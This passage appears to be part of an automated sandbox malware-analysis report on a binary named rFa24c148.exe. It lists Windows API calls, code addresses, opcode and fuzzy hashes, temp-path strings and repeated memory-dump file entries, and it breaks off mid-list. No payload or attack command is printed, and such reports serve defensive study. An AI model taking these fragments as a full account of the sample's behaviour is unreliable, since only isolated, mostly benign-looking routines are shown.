                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 11a1351ddf50c58e35ddc122bd4c143b08e9209a670521ddf1897a2708112133
                                                                                              • Instruction ID: 5f088aa0ca27e90fd893fee14e64151101962dab4a112754cbcab5b472a91c15
                                                                                              • Opcode Fuzzy Hash: 11a1351ddf50c58e35ddc122bd4c143b08e9209a670521ddf1897a2708112133
                                                                                              • Instruction Fuzzy Hash: 53F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08315B104466F601F5190C674AD018B39
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00422698,00422698,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404896
                                                                                              • wsprintfW.USER32 ref: 0040489F
                                                                                              • SetDlgItemTextW.USER32(?,00422698), ref: 004048B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: 3ce40e38d5b697acbaf551dfd4031fa8a76976e20437f1852b8b62a4044f6b57
                                                                                              • Instruction ID: 59e17c8afd225f679fed4f3ac3ee25800eeb16d6bc796772b25e59257c8be9d1
                                                                                              • Opcode Fuzzy Hash: 3ce40e38d5b697acbaf551dfd4031fa8a76976e20437f1852b8b62a4044f6b57
                                                                                              • Instruction Fuzzy Hash: FB11E2776002243BDB10666D9C49EEF369DDBC6334F14863BFA29F61D1E978881186E8
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,?,C:\,?,004058E1,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 0040587B
                                                                                              • CharNextW.USER32(00000000), ref: 00405880
                                                                                              • CharNextW.USER32(00000000), ref: 00405898
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext
                                                                                              • String ID: C:\
                                                                                              • API String ID: 3213498283-3404278061
                                                                                              • Opcode ID: b0c2eef9241feed9457590fddbc2aab5f3d07ba2361cf94bd4ebf9b70b50b23f
                                                                                              • Instruction ID: 0e45d3d7899051d123986adb95df4b68677bfc9f51f839bc1fffa0be8c86f108
                                                                                              • Opcode Fuzzy Hash: b0c2eef9241feed9457590fddbc2aab5f3d07ba2361cf94bd4ebf9b70b50b23f
                                                                                              • Instruction Fuzzy Hash: ABF09013910F1195DF3176584C55A7B6BBCEF54361B04C03BEE42B72C0D3B84CA58A9A
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 004057C8
                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 004057D2
                                                                                              • lstrcatW.KERNEL32(?,00409014), ref: 004057E4
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004057C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-3081826266
                                                                                              • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                              • Instruction ID: 6d7e1b30bb844f15b9b36030bcc4b7738a51439c8837860c8faeba4cfa6a7ffc
                                                                                              • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                              • Instruction Fuzzy Hash: 81D0A721505930AAC2127B448C04DDF73ACEE45340340483BF600B30E1C7781D418BFD
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1404258612-0
                                                                                              • Opcode ID: a69f105ff7c1ed7042804ff3785ec88b73d7adcb7f3cde9c988f9f75693ffed6
                                                                                              • Instruction ID: c80361359d7f931d767c6e620dd41e9efa8b0f2766ef6758dcd107922aa8e93c
                                                                                              • Opcode Fuzzy Hash: a69f105ff7c1ed7042804ff3785ec88b73d7adcb7f3cde9c988f9f75693ffed6
                                                                                              • Instruction Fuzzy Hash: 8E110671A00109AEEB11DFA5C945DEEBBB9EF44344F21407AF901F62A1D7349E50DB68
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,00402EE5,00000001,?,?,?,00000000,00403425,?), ref: 00402D18
                                                                                              • GetTickCount.KERNEL32 ref: 00402D36
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402D53
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403425,?), ref: 00402D61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: a44779084e06eb4c2f5f1059993455e157fff419ca32818d5ef93385285d2376
                                                                                              • Instruction ID: 4886259ddd31cdb6a9694f28afcf93f0b8e262fe2de839e253ac22cc8a8e0fbd
                                                                                              • Opcode Fuzzy Hash: a44779084e06eb4c2f5f1059993455e157fff419ca32818d5ef93385285d2376
                                                                                              • Instruction Fuzzy Hash: 09F05E3198A221ABD6315B20FE4C99B7BA4FB05B11B14547AF005F11E4C2B84C81CB9C
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00404FC4
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405015
                                                                                                • Part of subcall function 00404008: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040401A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: d9e9b5ae7c041b12dac160d84c9107cc66b3c7e025393d4bf5171a64b49731b5
                                                                                              • Instruction ID: 66009aff32d7b8830e361c6277d22b8a437e9b10976337e76806f1b42b6c8603
                                                                                              • Opcode Fuzzy Hash: d9e9b5ae7c041b12dac160d84c9107cc66b3c7e025393d4bf5171a64b49731b5
                                                                                              • Instruction Fuzzy Hash: 7A017172100609ABDF209F11DD80A5F3A25E784318F204037FB00761D1C37A9D51DAAE
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,00403684,004034C6,?), ref: 004036C6
                                                                                              • GlobalFree.KERNEL32(?), ref: 004036CD
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004036BE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$GlobalLibrary
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 1100898210-3081826266
                                                                                              • Opcode ID: 625fa06925f8270b1afe367a89cf7ebbb118f8284009cdbee328cf168e922138
                                                                                              • Instruction ID: e725929a78bd54513bffc085a294c09ba81a7575a3dcdc05b4864a3003f147fa
                                                                                              • Opcode Fuzzy Hash: 625fa06925f8270b1afe367a89cf7ebbb118f8284009cdbee328cf168e922138
                                                                                              • Instruction Fuzzy Hash: 8AE0C2339010206BC7315F55EC0871ABBAC6F99B72F054527E9407B3A18374AC524FDC
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFa24c148.exe,C:\Users\user\Desktop\rFa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 00405814
                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFa24c148.exe,C:\Users\user\Desktop\rFa24c148.exe,80000000,00000003,?,?,?,00000000,00403425), ref: 00405824
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
